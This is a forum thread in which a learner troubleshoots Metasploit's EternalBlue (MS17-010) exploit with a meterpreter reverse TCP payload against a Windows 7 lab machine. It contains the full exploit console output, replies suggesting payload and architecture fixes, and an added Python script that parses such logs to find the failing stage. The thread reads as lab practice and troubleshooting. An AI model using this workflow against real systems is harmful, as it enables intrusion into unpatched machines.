Why doesn't the eternalblue exploit work in metasploit?
#1
Foreword: Forgive me if there is something incomprehensible in this text. I don't speak English well.

So. I decided to study metasploit. I decided to try the tutorial. One of the first exploits found on the page is eternalblue with meterpreter reverse tcp. Having pretty much worn myself out with a virtual machine and setting up network interfaces, I checked the machine for this vulnerability with a scanner. And it worked! The machine is vulnerable!!!!
Code:
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


I thought there was not much left before I would get access, but then a bummer was waiting for me (((

When launching the exploit, it writes errors:
Code:
[*]Started reverse TCP handler on 192.168.1.215:4444
[*]192.168.1.228:445 - Executing automatic check (disable AutoCheck to override)
[*]192.168.1.228:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.228:445 - The target is vulnerable.
[*]192.168.1.228:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 12 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 17 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 22 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]Exploit completed, but no session was created.



So what should I do with this? Why doesn't it work? How do I solve it?
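An added example, not from the thread or from Metasploit itself: a small Python triage helper that reads msfconsole output like the run above and reports which stage stopped making progress. The sample log embedded in it is a constructed excerpt of the output posted above (the real run repeats the same pattern three times). Its purpose is educational: the output above shows the kernel-side overwrite reported as successful on every attempt while the handler never received a connection, which points at the callback path (LHOST/LPORT reachability) rather than at the target, and that is exactly what the thread's resolution turned out to be.

```python
import re

# Constructed excerpt of the msfconsole output from this thread (a few lines
# were kept per attempt; the real run repeats the same pattern three times).
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 192.168.1.215:4444
[+] 192.168.1.228:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.1.228:445 - The target is vulnerable.
[*] 192.168.1.228:445 - Trying exploit with 12 Groom Allocations.
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.228:445 - Sending egg to corrupted connection.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.228:445 - Trying exploit with 17 Groom Allocations.
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.228:445 - Trying exploit with 22 Groom Allocations.
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
"""

GROOM_RE = re.compile(r"Trying exploit with (\d+) Groom Allocations")
HANDLER_RE = re.compile(r"Started reverse TCP handler on (\S+)")
SESSION_RE = re.compile(r"session \d+ opened", re.IGNORECASE)


def parse_attempts(log: str) -> list:
    """Split the log into one record per exploit attempt (keyed by groom count)."""
    attempts = []
    current = None
    for line in log.splitlines():
        m = GROOM_RE.search(line)
        if m:
            current = {"groom": int(m.group(1)), "overwrite_ok": False, "failed": False}
            attempts.append(current)
        elif current is not None:
            if "overwrite completed successfully" in line:
                current["overwrite_ok"] = True
            elif "FAIL" in line:
                current["failed"] = True
    return attempts


def diagnose(log: str) -> str:
    """Coarse verdict: which stage of the run stopped making progress."""
    if SESSION_RE.search(log):
        return "session_opened"
    if "The target is vulnerable" not in log and "likely VULNERABLE" not in log:
        return "check_not_confirmed"
    attempts = parse_attempts(log)
    if not attempts:
        return "no_exploit_attempt"
    if any(a["overwrite_ok"] for a in attempts):
        # The kernel-side stage reported success but the handler saw nothing,
        # so the callback to LHOST:LPORT is the suspect (in this thread the
        # cause was an unopened port on the attacking host).
        return "no_callback"
    return "overwrite_failed"


def report(log: str) -> str:
    """Human-readable summary used when the module is run directly."""
    handler = HANDLER_RE.search(log)
    lines = [f"handler: {handler.group(1) if handler else 'not started'}"]
    for a in parse_attempts(log):
        status = "overwrite ok" if a["overwrite_ok"] else "overwrite failed"
        tail = " then FAIL" if a["failed"] else ""
        lines.append(f"groom={a['groom']:>3}: {status}{tail}")
    lines.append(f"verdict: {diagnose(log)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Run it on a saved msfconsole transcript by replacing SAMPLE_LOG with the file contents; the verdict strings are deliberately coarse so they can be compared across repeated runs (for example, a run that never reaches "overwrite ok" is a target or architecture mismatch, which is a different problem from the one in this thread).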
#2
Could be a lot of things, but I'll give you the benefit of the doubt and not ask too many stupid questions; the tutorial covered RHOSTs/LHOSTs so I'm assuming you followed all steps.

If you are on Ubuntu/Debian, there is a chance the package in the official repositories (if there is one) doesn't come installed with a bunch of Ruby Gems that are actually required. Install from source and make sure all the dependencies are there.

If you are not using latest Kali (2021.1), msf might be outdated: run apt update and upgrade.

Make sure the device you're pentesting is the same architecture as your payload (the tutorial uses x64.)

Use a different payload if all else fails. There are lots of reverse_tcp payloads (meterpreter, staged, etc.)
#3
Sometimes, all you have to do is relaunch the exact same attack, and it will work.
Sometimes, you'll have to change your payload, staged to stageless, etc.
Sometimes, the machine you are targeting actually isn't exploitable, and you'll have to find another way in.
#4
(03-11-2021, 05:25 PM)poppopret Wrote: Could be a lot of things, but I'll give you the benefit of the doubt and not ask too many stupid questions; the tutorial covered RHOSTs/LHOSTs so I'm assuming you followed all steps.

If you are on Ubuntu/Debian, there is a chance the package in the official repositories (if there is one) doesn't come installed with a bunch of Ruby Gems that are actually required. Install from source and make sure all the dependencies are there.

If you are not using latest Kali (2021.1), msf might be outdated: run apt update and upgrade.

Make sure the device you're pentesting is the same architecture as your payload (the tutorial uses x64.)

Use a different payload if all else fails. There are lots of reverse_tcp payloads (meterpreter, staged, etc.)

The version is the latest. I tried changing the payload to 3-4 others, but the problem does not go away. Also, sometimes the OS itself reboots because some error occurs with lsass.

(03-12-2021, 12:16 AM)Wipe_TS Wrote: Sometimes, all you have to do is relaunch the exact same attack, and it will work.
Sometimes, you'll have to change your payload, staged to stageless, etc.
Sometimes, the machine you are targeting actually isn't exploitable, and you'll have to find another way in.

OK, good to know.

MY GOD! I'm so dumb! I forgot to open the ports XD This is my constant headache XD

Thanks for the help ;)